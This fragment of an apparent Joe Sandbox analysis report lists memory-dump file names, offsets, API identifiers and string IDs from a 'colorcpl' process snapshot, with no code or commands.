                          • Snapshot File: hcaresult_8_2_4c80000_colorcpl.jbxd
                          Similarity
                          • API ID: ___swprintf_l
                          • String ID: %%%u$]:%u
                          • API String ID: 48624451-3050659472
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000008.00000002.2288885160.0000000004C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C80000, based on PE: true
                          • Associated: 00000008.00000002.2288885160.0000000004DA9000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 00000008.00000002.2288885160.0000000004DAD000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 00000008.00000002.2288885160.0000000004E1E000.00000040.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_4c80000_colorcpl.jbxd
                          Similarity
                          • API ID: __aulldvrm
                          • String ID: +$-
                          • API String ID: 1302938615-2137968064
                          Strings
                          Memory Dump Source
                          • Source File: 00000008.00000002.2288885160.0000000004C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C80000, based on PE: true
                          • Associated: 00000008.00000002.2288885160.0000000004DA9000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 00000008.00000002.2288885160.0000000004DAD000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 00000008.00000002.2288885160.0000000004E1E000.00000040.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_4c80000_colorcpl.jbxd
                          Similarity
                          • API ID:
                          • String ID: $$@
                          • API String ID: 0-1194432280